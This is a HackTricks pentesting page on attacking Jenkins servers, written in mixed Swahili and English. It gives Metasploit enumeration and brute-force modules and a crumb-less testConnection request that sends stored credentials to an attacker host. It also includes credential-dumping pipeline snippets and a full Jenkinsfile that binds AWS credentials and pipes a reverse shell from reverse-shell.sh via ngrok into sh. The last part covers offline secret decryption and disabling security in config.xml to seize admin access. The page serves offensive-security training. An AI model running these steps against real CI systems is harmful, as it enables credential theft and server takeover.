Usalama wa Jenkins

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Taarifa za Msingi

Jenkins ni zana inayotoa njia rahisi ya kuanzisha continuous integration au continuous delivery (CI/CD) mazingira kwa karibu kila mchanganyiko wa lugha za programu na repositori za msimbo wa chanzo kwa kutumia pipelines. Zaidi ya hayo, inafanya automatisi ya kazi mbalimbali za kawaida za maendeleo. Ingawa Jenkins haiondoi hitaji la kuandika scripts kwa hatua binafsi, inatoa njia ya haraka na thabiti zaidi ya kuunganisha mnyororo mzima wa zana za kujenga, kujaribu, na kusambaza kuliko mtu anaweza kwa urahisi kuunda kwa mikono.

Basic Jenkins Information

Uorodheshaji Bila Uthibitisho

Ili kutafuta kurasa za Jenkins zenye kuvutia bila uthibitisho kama (/people or /asynchPeople, this lists the current users) unaweza kutumia:

msf> use auxiliary/scanner/http/jenkins_enum

Angalia kama unaweza kutekeleza amri bila kuhitaji authentication:

msf> use auxiliary/scanner/http/jenkins_command

Bila vigezo vya kuingia unaweza kuangalia ndani ya /asynchPeople/ path au /securityRealm/user/admin/search/index?q= kwa majina ya watumiaji.

Unaweza kupata toleo la Jenkins kutoka kwenye njia /oops au /error

Udhaifu Zilizojulikana

GitHub - gquere/pwn_jenkins: Notes about attacking Jenkins servers

Kuingia

Katika taarifa za msingi unaweza kuangalia njia zote za kuingia ndani ya Jenkins:

Basic Jenkins Information

Usajili

Utaweza kupata instances za Jenkins ambazo zinakuruhusu kuunda akaunti na kuingia ndani yake. Rahisi kama hivyo.

SSO Kuingia

Pia ikiwa SSO functionality/plugins zilikuwepo basi unapaswa kujaribu kuingia kwenye application ukitumia akaunti ya mtihani (yaani, akaunti ya mtihani ya Github/Bitbucket). Trick from here.

Bruteforce

Jenkins haina sera ya nywila na mbinu za kuzuia brute-force kwa majina ya watumiaji. Ni muhimu kufanya brute-force dhidi ya watumiaji kwa sababu nywila dhaifu au majina ya watumiaji kama nywila yanaweza kutumika, hata majina ya watumiaji yaliyorudishwa nyuma kama nywila.

msf> use auxiliary/scanner/http/jenkins_login

Password spraying

Tumia this python script au this powershell script.

IP Whitelisting Bypass

Mashirika mengi huunganisha SaaS-based source control management (SCM) systems kama GitHub au GitLab na suluhisho la internal, self-hosted CI kama Jenkins au TeamCity. Mpangilio huu unawawezesha mifumo ya CI kupokea webhook events kutoka kwa wauzaji wa source control wa SaaS, hasa kwa kusababisha pipeline jobs.

Angalia: https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/

Internal Jenkins Abuses

Katika matukio haya tutadhani una account halali ya kufikia Jenkins.

Warning

Kulingana na mfumo wa Authorization uliowekwa kwenye Jenkins na idhini za mtumiaji aliyedukuliwa, huenda ukaweza au huwezi kufanya mashambulizi yafuatayo.

Kwa taarifa zaidi angalia taarifa za msingi:

Basic Jenkins Information

Listing users

Iwapo umeingia Jenkins unaweza kuorodhesha watumiaji wengine waliosajiliwa kwenye http://127.0.0.1:8080/asynchPeople/

Dumping builds to find cleartext secrets

Tumia this script ku-dump build console outputs na build environment variables ili kutafuta siri zilizo wazi.

python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
cd build_dumps
gitleaks detect --no-git -v

FormValidation/TestConnection endpoints (CSRF to SSRF/credential theft)

Baadhi ya plugins hutoa Jelly validateButton au test connection handlers chini ya paths kama /descriptorByName/<Class>/testConnection. Wakati handlers haziwekei POST au ukaguzi wa ruhusa, unaweza:

  • Badilisha POST kuwa GET na uondoe Crumb ili kupita ukaguzi wa CSRF.
  • Endesha handler kama low-priv/anonymous ikiwa hakuna ukaguzi wa Jenkins.ADMINISTER.
  • Fanya CSRF kwa admin na ubadilishe parameter ya host/URL ili exfiltrate credentials au kusababisha outbound calls.
  • Tumia makosa ya majibu (mf., ConnectException) kama SSRF/port-scan oracle.

Mfano wa GET (hakuna Crumb) kubadilisha wito la validation kuwa SSRF/credential exfiltration:

GET /descriptorByName/jenkins.plugins.openstack.compute.JCloudsCloud/testConnection?endPointUrl=http://attacker:4444/&credentialId=openstack HTTP/1.1
Host: jenkins.local:8080

If the plugin reuses stored creds, Jenkins will attempt to authenticate to attacker:4444 and may leak identifiers or errors in the response. See: https://www.nccgroup.com/research-blog/story-of-a-hundred-vulnerable-jenkins-plugins/

Stealing SSH Credentials

Ikiwa mtumiaji aliyepitwa na usalama ana idhini ya kutosha ya kuunda/kuhariri node mpya ya Jenkins na SSH credentials tayari zimehifadhiwa kwa ajili ya kufikia nodes nyingine, anaweza kuiba credentials hizo kwa kuunda/kuhariri node na kuweka host itakayorekodi credentials bila kuthibitisha host key:

Kwa kawaida utapata Jenkins SSH credentials katika global provider (/credentials/), hivyo unaweza pia kuzidump kama ungevuta siri nyingine yoyote. Maelezo zaidi katika Dumping secrets section.

RCE in Jenkins

Kupata shell in the Jenkins server kunampa mshambulizi fursa ya ku-leak zote za secrets na env variables na ku-exploit mashine nyingine zilizomo kwenye network ileile au hata kukusanya cloud credentials.

By default, Jenkins will run as SYSTEM. So, compromising it will give the attacker SYSTEM privileges.

RCE Creating/Modifying a project

Creating/Modifying a project is a way to obtain RCE over the Jenkins server:

Jenkins RCE Creating/Modifying Project

RCE Execute Groovy script

Unaweza pia kupata RCE kwa ku-execute Groovy script, ambayo inaweza kuwa kimyakimya zaidi kuliko kuunda project mpya:

Jenkins RCE with Groovy Script

RCE Creating/Modifying Pipeline

You can also get RCE by creating/modifying a pipeline:

Jenkins RCE Creating/Modifying Pipeline

Pipeline Exploitation

Ili ku-exploit pipelines bado unahitaji kuwa na ufikiaji wa Jenkins.

Build Pipelines

Pipelines zinaweza pia kutumika kama build mechanism in projects, katika kesi hiyo inaweza kusanidiwa file inside the repository itakayobeba pipeline syntax. Kwa default /Jenkinsfile inatumika:

Pia inawezekana kuhifadhi pipeline configuration files in other places (kwa mfano katika repositories nyingine) kwa lengo la kutenganisha repository access na pipeline access.

Kama mshambulizi ana write access over that file atakuwa na uwezo wa kuibadilisha na kuweza ku-trigger pipeline bila hata kuwa na access ya Jenkins.
Inawezekana mshambulizi atahitaji ku-bypass some branch protections (kutegemea platform na privileges za mtumiaji zinaweza kuzuiwa au siyo).

The most common triggers to execute a custom pipeline are:

  • Pull request to the main branch (or potentially to other branches)
  • Push to the main branch (or potentially to other branches)
  • Update the main branch and wait until itā€™s executed somehow

Note

If you are an external user you shouldnā€™t expect to create a PR to the main branch of the repo of other user/organization and trigger the pipelineā€¦ but if itā€™s bad configured you could fully compromise companies just by exploiting this.

Pipeline RCE

In the previous RCE section it was already indicated a technique to get RCE modifying a pipeline.

Checking Env variables

Inawezekana kutangaza clear text env variables kwa pipeline nzima au kwa stages maalum. Env variables hizi shouldnā€™t contain sensitive info, lakini mshambulizi anaweza kila mara check all the pipeline configurations/Jenkinsfiles:

pipeline {
agent {label 'built-in'}
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}

stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {

Dumping secrets

Kwa taarifa kuhusu jinsi secrets kawaida zinavyotendewa na Jenkins, angalia taarifa za msingi:

Basic Jenkins Information

Credentials zinaweza scoped to global providers (/credentials/) au kwa specific projects (/job/<project-name>/configure). Kwa hivyo, ili ku-exfiltrate zote unahitaji compromise at least all the projects zinazoshikilia secrets na kuendesha custom/poisoned pipelines.

Kuna tatizo jingine: ili kupata secret inside the env ya pipeline unahitaji kujua jina na aina ya secret. Kwa mfano, uki jaribu load a usernamePassword secret kama string secret, utapata error hii:

ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected

Hapa kuna njia ya kupakia baadhi ya aina za siri za kawaida:

withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
sh '''
env #Search for USERNAME and PASS
'''
}

withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
sh '''
env #Search for SECRET
'''
}

withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
sh '''
env # Search for USERPASS
'''
}

# You can also load multiple env variables at once
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
env
'''
}

Mwisho wa ukurasa huu unaweza find all the credential types: https://www.jenkins.io/doc/pipeline/steps/credentials-binding/

Warning

Njia bora ya dump all the secrets at once ni kwa compromising mashine ya Jenkins (kwa mfano running a reverse shell in the built-in node) kisha leaking the master keys na the encrypted secrets na kuzidecrypt offline.
Maelezo zaidi kuhusu jinsi ya kufanya hili yako katika the Nodes & Agents section na katika the Post Exploitation section.

Vichochezi

Kutoka katika the docs: Maelekezo ya triggers yamefafanua njia za kiotomatiki ambazo Pipeline inapaswa kuanzishwa tena. Kwa Pipelines ambazo zimeunganishwa na chanzo kama GitHub au BitBucket, triggers huenda zisihitajike kwani integration inayotegemea webhooks huenda tayari kuwepo. Triggers zinazopatikana kwa sasa ni cron, pollSCM na upstream.

Cron example:

triggers { cron('H */4 * * 1-5') }

Angalia mifano mingine katika nyaraka.

Nodes & Agents

A Jenkins instance inaweza kuwa na different agents running in different machines. Kutoka kwa mtazamo wa attacker, ufikiaji wa mashine tofauti unamaanisha different potential cloud credentials za kuiba au different network access ambazo zinaweza kutumiwa ku-exploit mashine nyingine.

For more information check the basic information:

Basic Jenkins Information

Unaweza kuorodhesha configured nodes katika /computer/, kawaida utapata Built-In Node (ambayo ni node inayomendesha Jenkins) na labda nyingine zaidi:

Ni specially interesting to compromise the Built-In node kwa sababu ina taarifa nyeti za Jenkins.

Ili kuonyesha unataka run the pipeline katika built-in Jenkins node unaweza kutaja ndani ya pipeline usanidi ifuatayo:

pipeline {
agent {label 'built-in'}

Mfano kamili

Pipeline katika agent maalum, na cron trigger, na pipeline na stage env variables, inapakia 2 variables katika step na kutuma reverse shell:

pipeline {
agent {label 'built-in'}
triggers { cron('H */4 * * 1-5') }
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}

stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
'''
}
}
}

post {
always {
cleanWs()
}
}
}

Arbitrary File Read to RCE

Jenkins Arbitrary File Read to RCE via ā€œRemember Meā€

RCE

Jenkins RCE with Groovy Script

Jenkins RCE Creating/Modifying Project

Jenkins RCE Creating/Modifying Pipeline

Post Exploitation

Metasploit

msf> post/multi/gather/jenkins_gather

Jenkins Secrets

Unaweza kuorodhesha secrets kwa kufikia /credentials/ ikiwa una ruhusa za kutosha. Kumbuka kwamba hii itaorodhesha tu secrets zilizo ndani ya credentials.xml, lakini build configuration files zinaweza pia kuwa na more credentials.

Ikiwa unaweza kuona configuration ya kila project, pia unaweza kuona hapo majina ya credentials (secrets) zinazotumiwa kufikia repository na credentials nyingine za project.

Kutoka Groovy

Jenkins Dumping Secrets from Groovy

Kutoka diski

Faili hizi zinahitajika ili decrypt Jenkins secrets:

  • secrets/master.key
  • secrets/hudson.util.Secret

Secrets hizi kwa kawaida zinaweza kupatikana katika:

  • credentials.xml
  • jobs/ā€¦/build.xml
  • jobs/ā€¦/config.xml

Hapa kuna regex ya kuzipata:

# Find the secrets
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
# Print only the filenames where the secrets are located
grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"

# Secret example
credentials.xml: <secret>{AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}</secret>

Decrypt Jenkins secrets offline

Ikiwa ume-dumped nywila zinazohitajika ili decrypt secrets, tumia script hii ku-decrypt secrets hizo

python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
06165DF2-C047-4402-8CAB-1C8EC526C115
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT

Decrypt Jenkins secrets from Groovy

println(hudson.util.Secret.decrypt("{...}"))

Unda mtumiaji mpya wa admin

  1. Fikia faili ya Jenkins config.xml katika /var/lib/jenkins/config.xml au C:\Program Files (x86)\Jenkis\
  2. Tafuta <useSecurity>true</useSecurity> na badilisha true kuwa false.
  3. sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml
  4. Anzisha upya seva ya Jenkins: service jenkins restart
  5. Sasa nenda kwenye portal ya Jenkins tena na Jenkins haitakuuliza credentials wakati huu. Nenda kwenye ā€œManage Jenkinsā€ ili kuweka administrator password tena.
  6. Washa tena security kwa kubadilisha mipangilio kuwa <useSecurity>true</useSecurity> na anzisha upya Jenkins tena.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks